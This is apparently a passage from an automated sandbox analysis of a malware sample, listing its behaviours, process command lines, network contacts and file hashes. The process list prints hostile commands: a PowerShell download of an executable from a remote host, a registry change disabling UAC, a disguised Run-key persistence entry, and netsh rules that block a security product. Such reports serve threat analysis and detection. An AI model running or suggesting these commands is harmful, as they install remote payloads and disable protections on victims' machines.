| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024744\Agghosts.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\programdata\20250223024744\Agghosts.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024744\Agghosts.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024744\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024744\Agghosts.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024744\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024744\1.bat" "
C:\programdata\20250223024744\Agghosts.exe
"C:\programdata\20250223024744\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024744\fhq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| N/A | 127.0.0.1:49226 | tcp | |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| CN | 103.235.47.188:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.23.205.233:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabE227.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarE43C.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2360-35-0x00000000042C0000-0x00000000046D9000-memory.dmp
memory/2360-36-0x0000000003EA0000-0x00000000042B4000-memory.dmp
memory/2360-37-0x00000000042C0000-0x00000000046D9000-memory.dmp
memory/2360-38-0x00000000003B0000-0x00000000003B1000-memory.dmp
C:\Users\Public\Downloads\20250223024744\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\ProgramData\20250223024744\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\ProgramData\lnk\2.lnk
| MD5 | 6fad1bf37c81f67455cf0a0c58a36ed0 |
| SHA1 | 16c12891c7a03ecc7368e27fa66e2b9bc82358a2 |
| SHA256 | 1e3dd035f7298068310ff06f8d4387cc239084a1590233fed5100663a1a70b81 |
| SHA512 | 2a1cebe1f6760ca088402b4c9725f706f16cd194d332c9c36415fc726504bea253319c1a6c85f20d32f2d42e71ff057a6fcab6baccc5d5871dbc30f231dd8139 |
C:\programdata\20250223024744\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\programdata\20250223024744\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
C:\Users\Public\Downloads\20250223024744\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
memory/2768-93-0x00000000004D0000-0x00000000004F9000-memory.dmp
memory/2360-99-0x0000000003EA0000-0x00000000042B4000-memory.dmp
memory/2360-98-0x00000000042C0000-0x00000000046D9000-memory.dmp
memory/544-105-0x000000001B620000-0x000000001B902000-memory.dmp
memory/544-106-0x00000000027F0000-0x00000000027F8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 38267d023abd6bf6c8425b2bc43be18a |
| SHA1 | 58f70c76e62487e0ec7c66a0ebb2efadcc698f8b |
| SHA256 | e9e94a30b36ca3fe3f93ecccbd53cb822c0c21cb41515a7d447f461558704de1 |
| SHA512 | e668f7c113938bf165ee0bc02b006dc2311085208962fa5b5a80f92487538db3684413c475119cd4b6a4900b2f07cfc84b2a44c0382d3e02cb30bf66fd8c8b7b |